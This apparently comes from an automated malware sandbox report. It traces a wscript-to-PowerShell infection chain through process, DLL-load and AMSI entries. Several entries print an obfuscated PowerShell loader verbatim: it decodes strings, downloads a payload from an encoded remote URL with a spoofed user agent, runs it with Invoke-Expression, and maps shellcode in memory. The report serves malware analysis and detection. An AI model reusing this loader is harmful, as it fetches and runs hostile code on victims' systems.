' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2679288955.0000000008C99000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .Core.pdb source: powershell.exe, 0000000D.00000002.2679288955.0000000008C70000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdbk source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdb source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match File source: 0000000D.00000002.2666861261.000000000632B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Blyantstegninger)$global:Prvekrt = [System.Text.Encoding]::ASCII.GetString($Skimmet)$global:Berceau=$Prvekrt.substring($Forblndede,$Antisiphon)<#Autogamies brnefdselsdagene Footlike
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((udkrsel $Periodically174 $Skelstene), (Variabeltypen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Endelighederne = [AppDomain]::CurrentDomain.GetAssembl
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Ao)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Eftersnakkens, $false).DefineType($Kiltens, $Gothersga
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Blyantstegninger)$global:Prvekrt = [System.Text.Encoding]::ASCII.GetString($Skimmet)$global:Berceau=$Prvekrt.substring($Forblndede,$Antisiphon)<#Autogamies brnefdselsdagene Footlike
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
